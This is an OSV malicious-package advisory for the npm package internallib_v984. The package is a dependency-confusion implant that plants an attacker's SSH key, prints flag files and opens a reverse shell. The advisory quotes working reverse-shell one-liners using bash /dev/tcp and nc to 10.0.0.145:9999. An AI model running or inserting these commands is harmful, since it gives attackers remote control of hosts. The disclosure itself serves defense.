MAL-2026-5695

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5695
Published
2026-06-12T15:28:17Z
Modified
2026-06-12T16:46:41.561188154Z
Summary
Malicious code in internallib_v984 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8)

Package exports a single command() function that, when invoked, performs three coordinated attacks against the host: (1) appends a hardcoded attacker-controlled SSH public key (tr0n@DESKTOP-GVIA2J0) to authorized_keys under /root/.ssh, /home/gitlab-runner/.ssh, and /home/internal/.ssh, granting persistent remote root and CI-runner login; (2) reads /root/root.txt, /home/internal/user.txt, and /home/gitlab-runner/user.txt and writes their contents to stdout; (3) opens a reverse shell to 10.0.0.145:9999 using three redundant methods (bash -i >& /dev/tcp/10.0.0.145/9999 0>&1, nc -e /bin/bash 10.0.0.145 9999, and a Node net.Socket connecting to the same address with spawn('/bin/bash')). The package has no README, no author or repository metadata, and the name internallib_v984 is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality — the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (10.0.0.145) further indicates the attacker expects to land inside a corporate or lab network where that address is routable.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005784",
            "versions": [
                "1.0.2"
            ],
            "sha256": "093b5433386d2468e78e9896d1c8566d06f6f3ac6544dc90d4e6fdb9d967c6ed",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:18Z",
            "import_time": "2026-06-12T16:32:16.195323356Z"
        },
        {
            "id": "IN-MAL-2026-005786",
            "versions": [
                "1.0.3"
            ],
            "sha256": "3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:20Z",
            "import_time": "2026-06-12T16:32:16.316167869Z"
        },
        {
            "id": "IN-MAL-2026-005783",
            "import_time": "2026-06-12T16:32:16.096173613Z",
            "sha256": "5910f34f83567d2d5f48fc2c3966537cc4b313570d77696c743d116fc2b54f05",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:18Z",
            "versions": [
                "1.0.4"
            ]
        },
        {
            "id": "IN-MAL-2026-005785",
            "versions": [
                "99.0.0"
            ],
            "sha256": "7e1e3c1f3e148527111254b20a9cbe8d1a6f5d6abaadc0e45c35ca4b2febc431",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:19Z",
            "import_time": "2026-06-12T16:32:16.257323353Z"
        },
        {
            "id": "IN-MAL-2026-005782",
            "versions": [
                "1.0.5"
            ],
            "sha256": "af6c7b94d4d81140d1e4d37ddf38ef298287d7e118ac0849311254c88ebb8916",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:17Z",
            "import_time": "2026-06-12T16:32:16.039312325Z"
        },
        {
            "id": "IN-MAL-2026-005787",
            "versions": [
                "1.0.1"
            ],
            "sha256": "b62a6df4be478a792579b9f9741361e56e14fdd0d96f97305bf1fd4a0f076a06",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:21Z",
            "import_time": "2026-06-12T16:32:16.35801051Z"
        }
    ]
}

Affected packages

npm / internallib_v984


Affected versions

1.*
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
99.*
99.0.0

Database specific

indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "c56e66a9a2949458b1ff04c051c756d7da43c20d8d7de439f5902becdb704360",
            "tlsh": "bb21001014f2223d1a3311a6eb17b067322388136229db517acc831a0f89e9c57ef3d4"
        },
        {
            "path": "package.json",
            "sha256": "4efa558a27a2536419deb72dd9e9e73c9a541ca938a3b0a6e8e3376604db6ccb",
            "tlsh": "5fc092b149266d3760d547b41db1890a36a68d3f9406b4485b232a0c80efef368f930c"
        }
    ],
    "package_integrity": [
        {
            "filename": "internallib_v984-1.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-nLD1bGfeZmQk66wo48E0yMss13QtTa/lSunlSs5nyzYLJy9cU92yB1yqWeVbG3W29H9aq4JUn9SBQq7e5VnPGw==",
                "sha1": "e03ded23d8cae7cc88ab9c723cf5cb688f8669fe"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]